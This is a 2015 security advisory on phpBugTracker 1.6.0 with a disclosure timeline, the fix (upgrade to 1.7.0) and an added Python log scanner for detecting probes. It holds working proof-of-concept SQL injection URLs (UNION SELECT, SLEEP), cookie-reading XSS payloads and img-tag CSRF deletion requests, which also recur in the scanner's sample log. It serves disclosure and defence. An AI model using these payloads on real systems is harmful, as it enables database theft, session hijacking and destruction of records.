phpBugTracker 1.6.0 CSRF / XSS / SQL Injection

Published: 19 Feb 2015. Reported by Steffen Roesemann. Type: packetstorm. Source: packetstormsecurity.com

phpBugTracker v.1.6.0 multiple SQLi, XSS, CSRF vulnerabilities

Advisory: Multiple SQLi, stored/reflected XSS and CSRF vulnerabilities in phpBugTracker v.1.6.0
Advisory ID: SROEADV-2015-16  
Author: Steffen Rösemann  
Affected Software: phpBugTracker v.1.6.0  
Vendor URL: https://github.com/a-v-k/phpBugTracker  
Vendor Status: patched  
CVE-ID: will be requested after release on FullDisclosure via OSS-list
Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31  
  
==========================  
Vulnerability Description:  
==========================  
  
The issue tracker phpBugTracker v.1.6.0 suffers from multiple SQLi, stored/reflected XSS and CSRF vulnerabilities.
  
==================  
Technical Details:  
==================  
  
The following files used in a common phpBugTracker installation suffer from different SQLi, stored/reflected XSS and CSRF vulnerabilities:
  
===========  
project.php  
===========  
  
SQL injection / underlying CSRF vulnerability in project.php via the id parameter:

http://{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+
  
Stored XSS via input field "project name":  
  
http://{TARGET}/admin/project.php?op=add  
  
executed in: e.g. http://{TARGET}/admin/project.php, http://{TARGET}/index.php
  
  
========  
user.php  
========  
  
Reflected XSS in user.php via the use_js parameter:

http://{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1
  
executed in: same page  
  
  
=========  
group.php  
=========  
  
Reflected XSS in group.php via the use_js parameter:

http://{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1
  
executed in: same page  
  
(Blind) SQL injection / underlying CSRF vulnerability in group.php via the group_id parameter (used in different operations):

http://{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http://{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+
  
  
==========  
status.php  
==========  
  
SQL injection / underlying CSRF vulnerability in status.php via the status_id parameter:

http://{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
  
Stored XSS via input field "Description":  
  
http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0  
  
executed in: e.g. http://{TARGET}/admin/status.php  
  
CSRF vulnerability in status.php (delete statuses):  
  
<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}" >
  
  
==============  
resolution.php  
==============  
  
SQL injection / underlying CSRF vulnerability in resolution.php via the resolution_id parameter:

http://{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
  
CSRF vulnerability in resolution.php (delete resolutions):  
  
<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}" >
  
  
============  
severity.php  
============  
  
SQL injection / underlying CSRF vulnerability in severity.php via the severity_id parameter:

http://{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
  
CSRF vulnerability in severity.php (delete severities):  
  
<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}" >
  
Stored XSS in severity.php via input field "Description":  
  
http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0  
  
executed in: e.g. http://{TARGET}/admin/severity.php  
  
  
============  
priority.php  
============  
  
SQL injection / underlying CSRF vulnerability in priority.php via the priority_id parameter:

http://{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+
  
  
======  
os.php  
======  
  
SQL injection / underlying CSRF vulnerability in os.php via the os_id parameter:

http://{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
  
CSRF vulnerability in os.php (delete operating systems):  
  
<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >  
  
Stored XSS vulnerability in os.php via input field "Regex":  
  
http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0  
  
executed in: e.g. http://{TARGET}/admin/os.php
  
  
============  
database.php  
============  
  
SQL injection / underlying CSRF vulnerability in database.php via the database_id parameter:

http://{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+
  
CSRF vulnerability in database.php (delete databases):  
  
<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}" >
  
Stored XSS vulnerability in database.php via input field "Name":  
  
http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0  
  
  
========  
site.php  
========  
  
CSRF vulnerability in site.php (delete sites):  
  
<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >  
  
SQL injection / underlying CSRF vulnerability in site.php via the site_id parameter:

http://{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+
  
  
=======  
bug.php  
=======  
  
This issue was already assigned CVE-2004-1519, but does not appear to have been corrected since the assignment:

SQL injection / underlying CSRF vulnerability in bug.php via the project parameter:

http://{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+
  
For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.  
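The findings above share one shape: integer id parameters of the admin scripts reaching SQL unvalidated, the use_js parameter reflected into markup, and destructive op=del operations triggered by a bare GET. A defender-side log check for exactly those traces, added here as an example and not part of the advisory; the host name tracker.example.org and the access-log lines are constructed, with the query strings copied from the advisory's PoC URLs.

```python
"""Flag phpBugTracker 1.6.0 probe patterns in web access logs (added example; constructed data)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Combined log format: client - - [time] "METHOD target HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')
# Identifier parameters of the affected admin scripts; the application expects integers here.
ID_PARAMS = {"id", "group_id", "status_id", "resolution_id", "severity_id",
             "priority_id", "os_id", "database_id", "site_id", "user_id", "project"}
SQLI_RE = re.compile(r"union\s+select|sleep\s*\(|substring\s*\(|'|--", re.I)

def classify(line, own_host="tracker.example.org"):
    """Return (client, script, tags) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, _status, referer = m.groups()
    url = urlsplit(target)
    tags = set()
    if url.path.endswith(".php"):
        # parse_qsl decodes %xx and '+' like PHP's $_GET, so checks see what the scripts saw.
        params = dict(parse_qsl(url.query, keep_blank_values=True))
        for name, value in params.items():
            if name in ID_PARAMS and not value.isdigit():
                tags.add("sqli" if SQLI_RE.search(value) else "non_numeric_id")
            if name == "use_js" and value not in ("0", "1"):
                tags.add("xss")
        # Destructive op by plain GET with no on-site referer: the <img src="...op=del..."> CSRF trace.
        if params.get("op") == "del" and method == "GET" and own_host not in referer:
            tags.add("csrf")
    return client, url.path, tags

def scan(lines, own_host="tracker.example.org"):
    findings = []
    for line in lines:
        parsed = classify(line, own_host)
        if parsed and parsed[2]:
            findings.append((parsed[0], parsed[1], sorted(parsed[2])))
    return findings

# Constructed sample log; the query strings reproduce the advisory's PoC URLs, last line is benign.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Feb/2015:10:00:01 +0100] "GET /admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+ HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Feb/2015:10:00:05 +0100] "GET /admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Feb/2015:10:00:09 +0100] "GET /admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1 HTTP/1.1" 200 3310 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [19/Feb/2015:10:01:00 +0100] "GET /admin/site.php?op=del&site_id=3 HTTP/1.1" 302 0 "http://other-site.example.net/page.html" "Mozilla/5.0"',
    '192.0.2.10 - - [19/Feb/2015:10:02:00 +0100] "GET /admin/status.php?op=edit&status_id=4 HTTP/1.1" 200 4000 "http://tracker.example.org/admin/status.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The referer heuristic only catches the GET-based delete pattern the advisory shows; after upgrading to 1.7.0 the same check still serves as a regression signal for any id parameter that is not a plain integer.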
  
  
  
=========  
Solution:  
=========  
  
Update to version 1.7.0.  
  
  
====================  
Disclosure Timeline:  
====================  
03/05-Feb-2015 - found the vulnerabilities
05-Feb-2015 - informed the developers (see [3])
05-Feb-2015 - release date of this security advisory [without technical details]
05-Feb-2015 - forked the GitHub repository to keep it available for other security researchers (see [4])
05/06-Feb-2015 - vendor replied, will provide a patch for the vulnerabilities
09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical details will be released on 19th February 2015
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - sent to FullDisclosure
  
  
========  
Credits:  
========  
  
Vulnerabilities found and advisory written by Steffen Rösemann.  
  
===========  
References:  
===========  
  
[1] https://github.com/a-v-k/phpBugTracker  
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html  
[3] https://github.com/a-v-k/phpBugTracker/issues/4  
[4] https://github.com/sroesemann/phpBugTracker  
  
  
